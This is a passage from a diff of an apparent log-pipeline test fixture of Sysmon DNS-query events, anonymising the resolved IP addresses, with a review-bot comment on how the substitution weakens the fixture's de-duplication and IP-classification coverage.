Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802433000Z'/\u003e\u003cEventRecordID\u003e107\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.112\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epr-bh.ybp.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ds-pr-bh.ybp.gysm.yahoodns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -2015,7 +2015,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802441200Z'/\u003e\u003cEventRecordID\u003e108\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.113\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eps.eyeota.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:3.83.220.223;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802441200Z'/\u003e\u003cEventRecordID\u003e108\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.113\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eps.eyeota.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, @@ -2033,7 +2033,7 @@ }, "event_data": { "QueryStatus": "0", - "QueryResults": "::ffff:3.83.220.223;", + "QueryResults": "::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.113", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -2113,7 +2113,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802456000Z'/\u003e\u003cEventRecordID\u003e109\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.146\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eidpix.media6degrees.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 idpix.media6degrees.com.cdn.cloudflare.net;type: 5 map.media6degrees.com;type: 5 map.media6degrees.com.cdn.cloudflare.net;::ffff:204.2.197.201;::ffff:204.2.197.211;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802456000Z'/\u003e\u003cEventRecordID\u003e109\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.146\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eidpix.media6degrees.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 idpix.media6degrees.com.cdn.cloudflare.net;type: 5 map.media6degrees.com;type: 5 map.media6degrees.com.cdn.cloudflare.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" }, "winlog": { 
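Review bot: The substitution collapses what were two distinct resolved addresses into the same address repeated, `::ffff:89.160.20.156;::ffff:89.160.20.156;`, in the new `original` string here and in the `event_data.QueryResults` hunk at `@@ -2135`; the same happens four-fold at `@@ -2344`/`@@ -2370` and again at `@@ -2386`/`@@ -2415`. If the pipeline derives a de-duplicated list such as `dns.resolved_ip` or `related.ip` from QueryResults, this fixture can no longer distinguish a de-duplication regression from correct behaviour, so mapping each original address to a different member of the supported test range would preserve that coverage. The former public name-server addresses that became `192.168.x.x` are now RFC 1918 space, which means any public/private classification or geo enrichment these records exercised is now covered by a single public address only. If this file is the generated expected output of the pipeline test, the change belongs in the test input log with the expected file regenerated, so fields outside these hunks stay consistent with the visible edits.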
@@ -2135,7 +2135,7 @@
 "event_data": {
 "QueryName": "idpix.media6degrees.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 idpix.media6degrees.com.cdn.cloudflare.net;type: 5 map.media6degrees.com;type: 5 map.media6degrees.com.cdn.cloudflare.net;::ffff:204.2.197.201;::ffff:204.2.197.211;",
+ "QueryResults": "type: 5 idpix.media6degrees.com.cdn.cloudflare.net;type: 5 map.media6degrees.com;type: 5 map.media6degrees.com.cdn.cloudflare.net;::ffff:89.160.20.156;::ffff:89.160.20.156;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:03.146",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}",
@@ -2160,7 +2160,7 @@ "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802466200Z'/\u003e\u003cEventRecordID\u003e110\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.146\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etpc.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead-googlehosted.l.google.com;::ffff:172.217.10.1;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802466200Z'/\u003e\u003cEventRecordID\u003e110\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.146\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etpc.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead-googlehosted.l.google.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "log": { "level": "information" 
@@ -2186,7 +2186,7 @@
 "ProcessId": "2736",
 "QueryName": "tpc.googlesyndication.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 pagead-googlehosted.l.google.com;::ffff:172.217.10.1;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;",
+ "QueryResults": "type: 5 pagead-googlehosted.l.google.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:03.146"
 },
@@ -2257,7 +2257,7 @@ { "@timestamp": "2021-05-05T15:30:51.698Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802480600Z'/\u003e\u003cEventRecordID\u003e111\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.182\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimage2.pubmatic.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pug44000nfc.pubmatic.com;type: 5 pug44000nf.pubmatic.com;::ffff:162.248.19.147;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802480600Z'/\u003e\u003cEventRecordID\u003e111\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.182\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimage2.pubmatic.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pug44000nfc.pubmatic.com;type: 5 pug44000nf.pubmatic.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" 
@@ -2278,7 +2278,7 @@
 "ProcessId": "2736",
 "QueryName": "image2.pubmatic.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 pug44000nfc.pubmatic.com;type: 5 pug44000nf.pubmatic.com;::ffff:162.248.19.147;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;"
+ "QueryResults": "type: 5 pug44000nfc.pubmatic.com;type: 5 pug44000nf.pubmatic.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;"
 },
 "process": {
 "thread": {
@@ -2305,7 +2305,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802496100Z'/\u003e\u003cEventRecordID\u003e112\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.183\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esam.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 www.msn.com;type: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:204.79.197.203;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802496100Z'/\u003e\u003cEventRecordID\u003e112\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.183\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esam.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 www.msn.com;type: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "winlog": { "version": 5, @@ -2325,7 +2325,7 @@ "ProcessId": "2736", "QueryName": "sam.msn.com", "QueryStatus": "0", - "QueryResults": "type: 5 www.msn.com;type: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:204.79.197.203;", + "QueryResults": "type: 5 www.msn.com;type: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.183", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" 
@@ -2344,7 +2344,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802516200Z'/\u003e\u003cEventRecordID\u003e113\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.222\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.sca1b.amazontrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:52.85.89.250;::ffff:52.85.89.94;::ffff:52.85.89.22;::ffff:52.85.89.139;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802516200Z'/\u003e\u003cEventRecordID\u003e113\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.222\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.sca1b.amazontrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -2370,7 +2370,7 @@
 "computer_name": "vagrant-2016",
 "provider_guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
 "event_data": {
- "QueryResults": "::ffff:52.85.89.250;::ffff:52.85.89.94;::ffff:52.85.89.22;::ffff:52.85.89.139;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;",
+ "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:03.222",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}",
